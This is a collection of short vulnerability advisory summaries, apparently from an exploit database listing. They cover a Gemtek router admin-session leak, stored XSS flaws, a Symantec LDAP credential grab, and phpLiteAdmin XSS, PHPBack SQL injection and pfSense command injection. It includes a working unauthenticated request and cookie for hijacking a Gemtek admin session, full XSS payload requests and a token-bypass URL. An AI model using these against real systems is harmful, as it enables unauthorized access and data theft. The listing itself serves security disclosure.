A vulnerability exists for Gemtek CPE7000 model ID WLTCS-106 which allows unauthenticated remote attackers to retrieve a valid Administrative SID. To obtain an administrative web session inject this SID in your client's cookie with values as follow: userlevel=2;sid=<SID> Tested on Hardware version V02A and Firmware version 01.01.02.082.
A persistent input validation and mail encode web vulnerability has been discovered in the official C & C++ for OS web-application (api). The persistent web vulnerability allows an attacker to inject malicious script codes on the appliaction-side of the vulnerable service module. The vulnerability is located in the `name` and `message` value of the `contact` module. Remote attackers are able to inject own malicious script codes to the vulnerable `name` and `message` value of the `contact` module.
A persistent input validation web vulnerability has been discovered in the official Totemomail v4.x & v5.x web-application. The vulnerability allows remote attackers to bypass the filter validation to inject malicious script codes on the application-side (persistent).
The sysconfg cgi application leaks a valid 'SID' (session id) when the following unauthenticated request is made: GET /cgi-bin/sysconf.cgi?page=ajax.asp&action=login_confirm HTTP/1.1. The response body has the form: <checkcode>,<sid>. The sid thus obtained can be used to 'unlock' the cliend-side administration interface and/or to directly issue request that are usually restricted to administrative accounts. The sysconfg cgi application fails to sanitize user input, allowing an attacker to hijack the command issued to the 'iperf' binary, a commonly-used network testing tool that can create TCP and UDP data streams and measure the throughput of a network that is carrying them.
This module will grab the AD account saved in Symantec Messaging Gateway and then decipher it using the disclosed symantec pbe key. Note that authentication is required in order to successfully grab the LDAP credentials, you need at least a read account. Version 10.6.0-7 and earlier are affected.
phpLiteAdmin is a web-based SQLite database admin tool written in PHP with support for SQLite3 and SQLite2. XSS1: URL: http://localhost/phpliteadmin/phpliteadmin.php?action=table_create&confirm=1 METHOD: Post PARAMETER: 0_defaultoption PAYLOAD: "><script>alert(1)</script> Request: POST /phpliteadmin/phpliteadmin.php?action=table_create&confirm=1 HTTP/1.1 tablename=testtable&rows=2&0_field=id&0_type=INTEGER&0_defaultoption=defined"><script>alert(1)</script>&0_defaultvalue=1&1_field=name&1_type=INTEGER&1_defaultoption=defined&1_defaultvalue=test XSS2: URL: http://localhost/phpliteadmin/phpliteadmin.php?view=import METHOD: Post PARAMETER: file PAYLOAD: "><script>alert(2)</script> Request: POST /phpliteadmin/phpliteadmin.php?view=import HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------1675024292505 Content-Length: 1124 -----------------------------1675024292505 Content-Disposition: form-data; name="import_type" sql -----------------------------1675024292505 Content-Disposition: form-data; name="single_table" testtable -----------------------------1675024292505 Content-Disposition: form-data; name="import_csv_fieldsterminated" ; -----------------------------1675 024292505 Content-Disposition: form-data; name="import_csv_enclosed" " -----------------------------1675024292505 Content-Disposition: form-data; name="import_csv_escaped" -----------------------------1675024292505 Content-Disposition: form-data; name="import_csv_newline" auto -----------------------------1675024292505 Content-Disposition: form-data; name="import_csv_replace" on -----------------------------1675024292505 Content-Disposition: form-data; name="file"; filename=""><script>alert(2)</script> -----------------------------1675024292505--
PHPBack v1.3.0 is vulnerable to boolean blind and error based SQL Injection in the 'orderby' parameter. By sending SQL Injection query using MySQL XPATH function ExtractValue() we can grab information from the errors generated. This is useful when we get no output except MySQL errors, we can force data extraction through the error. When using ExtractValue() function to generate error, evaluated results of our SQL query will be embedded in query error message. Adding a colon "0x3a" to the beginning of the query will ensure parsing will always FAIL generating an error along with our extracted data. This method only works on MySQL version >= 5.1, we can then use SQL LIMIT function to move thru database informations.
modified eCommerce is an Open Source shopsoftware. Attackable are the GET-parameters 'orders_status' and 'customers_status' through 'easybillcsv.php': As default option the easybill-module is not installed and the constant MODULE_EASYBILL_CSV_CRON_TOKEN is not set. As long as the easybill-module is not installed, it is possible to bypass the restriction: [Shoproot]/api/easybill/easybillcsv.php?token=MODULE_EASYBILL_CSV_CRON_TOKEN. The variables $this->from_orders_status and $this->from_customers_status are set in lines 20 and 21. In lines 25 and 26 they are exploded to an array. In lines 30 and 31 they are converted to integers. In lines 35 and 36 they are imploded to a string. In lines 40 and 41 they are used in a SQL-query with single quotes and in lines 45 and 46 with brackets.
The pfSense community edition firewall is vulnerable to multiple vulnerabilities, including remote code execution via command injection as an authenticated non-administrative user, stored and reflected cross-site scripting. The status_rrd_graph_img.php page is vulnerable to command injection via the graph GET parameter. A non-administrative authenticated attacker having access privileges to the graph status functionality can inject arbitrary operating system commands and execute them in the context of the root user. Although input validation is performed on the graph parameter through a regular expression filter, the pipe character is not removed. Octal characters sequences can be used to encode a payload, bypass the filter for illegal characters, and create a PHP file to download and execute a malicious file (i.e. reverse shell) from a remote attacker controlled host.
This vulnerability is an out-of-bounds write vulnerability in Windows 7 64-bit. It occurs when an application attempts to write to an unmapped memory region. On 32-bit Windows 7, it triggers a null pointer read.
Services By CQR